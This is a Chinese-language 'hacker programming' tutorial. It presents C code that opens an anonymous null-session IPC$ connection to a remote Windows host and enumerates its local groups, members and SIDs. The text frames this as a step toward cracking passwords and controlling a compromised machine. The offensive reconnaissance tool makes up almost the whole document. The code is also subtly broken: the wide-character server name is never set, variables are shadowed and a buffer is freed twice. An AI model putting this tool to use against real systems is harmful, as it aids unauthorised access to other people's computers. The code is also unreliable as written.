黑客编程教程（十二）取得系统用户权限

我们要取得肉鸡的控制权,首先必须有Administrator权限,获得权限的途径很多都是通过IPC$破解来获得用户密码. 
 

我们看一下代码:

 

#include <windows.h>

#include <stdio.h>

#include <lm.h>

 

#pragma comment (lib, "Mpr.lib")

#pragma comment (lib, "Netapi32.lib")

 

void getuser(char *);

 

void main( int argc, char *argv[ ] )

{            //空用户名和密码

DWORD ret;

char username[100] = "", password[100] = "";

char server[100] = "", ipc[100] = "";

NETRESOURCE NET;

 

if (argc == 1) 

{ 

exit(1);

}

 

strncpy(server,argv[1],100); 

printf("server: %s
", server);

 

sprintf(ipc,"\\%s\ipc$",server);

 

NET.lpLocalName = NULL;

NET.lpProvider = NULL;

NET.dwType = RESOURCETYPE_ANY;

NET.lpRemoteName = (char*)&ipc;

 

printf("setting up session... ");

ret = WNetAddConnection2(&NET,(const char *)&password,(const char *)&username,0);

                                                                          //建立空连接

if (ret != ERROR_SUCCESS)

{

printf("IPC$ connect fail.
");

exit(1);

}

else 

printf("IPC$ connect success.
");

getuser((char*)&server);

 

printf("Disconnect Server... ");

ret = WNetCancelConnection2((char*)&ipc,0,TRUE);                     //断开IPC连接

if (ret != ERROR_SUCCESS)

{

printf("fail.
");

exit(1);

}

else

printf("success.
");

exit (0);

}

 

void getuser(char *server)                       //取得用户的函数

{

DWORD ret, read, total, resume = 0;

int i;

LPVOID buff;

char comment[255];

wchar_t wserver[100];

 

do

{

ret = NetLocalGroupEnum(wserver, 1, (unsigned char **)&buff, MAX_PREFERRED_LENGTH, &read, &total, &resume);

 

if (ret != NERR_Success && ret != ERROR_MORE_DATA) 

{

printf("fail
");

break;

} 

PLOCALGROUP_INFO_1 info = (PLOCALGROUP_INFO_1) buff;

 

for (i=0; i<read; i++) 

{

printf("GROUP: %S
",info[i].lgrpi1_name);

 

WideCharToMultiByte(CP_ACP, 0, info[i].lgrpi1_comment , -1, comment,255,NULL,NULL); 

printf("	COMMENT: %s
",comment);

 

DWORD ret, read, total, resume = 0;

ret = NetLocalGroupGetMembers((const unsigned short*)&wserver, info[i].lgrpi1_name, 2, (unsigned char **)&buff, 1024, &read, &total, &resume);

 

if (ret != NERR_Success && ret != ERROR_MORE_DATA) 

{

printf("fail
");

break;

} 

 

PLOCALGROUP_MEMBERS_INFO_2 info = (PLOCALGROUP_MEMBERS_INFO_2) buff;

 

for (unsigned i=0; i<read; i++) 

{

printf("		%S
", info[i].lgrmi2_domainandname);

printf("			SID:%d
", info[i].lgrmi2_sid);

printf("			SIDUSAGE:%d
",info[i].lgrmi2_sidusage);

}

NetApiBufferFree (buff);

}

 

NetApiBufferFree (buff);

 

} 

while (ret == ERROR_MORE_DATA );

}